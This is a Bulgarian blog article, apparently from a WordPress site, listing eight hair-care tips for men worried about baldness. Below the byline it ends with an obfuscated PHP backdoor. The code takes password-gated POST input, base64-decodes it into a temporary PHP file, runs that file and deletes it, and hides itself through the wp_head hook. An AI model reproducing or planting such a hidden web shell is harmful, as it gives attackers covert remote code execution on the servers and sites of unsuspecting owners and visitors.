Специално за мъже: как да се опазим от оплешивяване – част 1 | Косопад

Специално за мъже: как да се опазим от оплешивяване – част 1

kosopad-pri-muje

Ето някои важни неща, които е добре да знае всеки мъж, който се сблъсква с оплешивяването. Около този проблем има много митове, с които трябва да сме наясно, за да взимаме правилните решения за косата си.

1. Шапките са позволени. Един от най- разпространените митове за оплешивяването е, че шапките го предизвикват. Не се притеснявайте изобщо. Носете шапки без да се притеснявате.
2. Високите температури са много вредни. Добре е да предпазваме скалпа си от излагане на много високи или много ниски температури. Крайностите са вредни, но най- вече горещината през лятото. Добре е да си покриваме главата, за да избегнем различни проблеми, като дерматит и себорея.
3. Можем да използваме гел. Това е още една широко разпространена легенда, но истината е, че не ни пречи.

miene-kosa
4. Шампоан за всеки тип коса. Важно е да изберем подходящият шампоан за нашия тип коса. Това ще ви помогне да удължите живота на косата си.
5. Търкането на косата. Голяма грешка при повечето мъже е, силното търкане на косата, когато сме нанесли шампоана. Избягвайте го, защото прекаленото търкане на косата никак не е полезно.
6. Изплакнете добре. Изплакнете добре косата си преди да излезете от банята.
7. Честота на миенето. Мъжете имат навика да използват шампоан всеки ден. Ако нямате проблем с косата, не е лошо да се миете всеки ден. Но когато го правите, измивате всички мазнини, а те ни предпазват от някои видове косопад. Най- добре е да пропускате един ден.
8. Плакнене със студена вода. Така затваряме кутикулата на косъма и няма опасност да се увреди.

30. април 2015 19:17:48 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}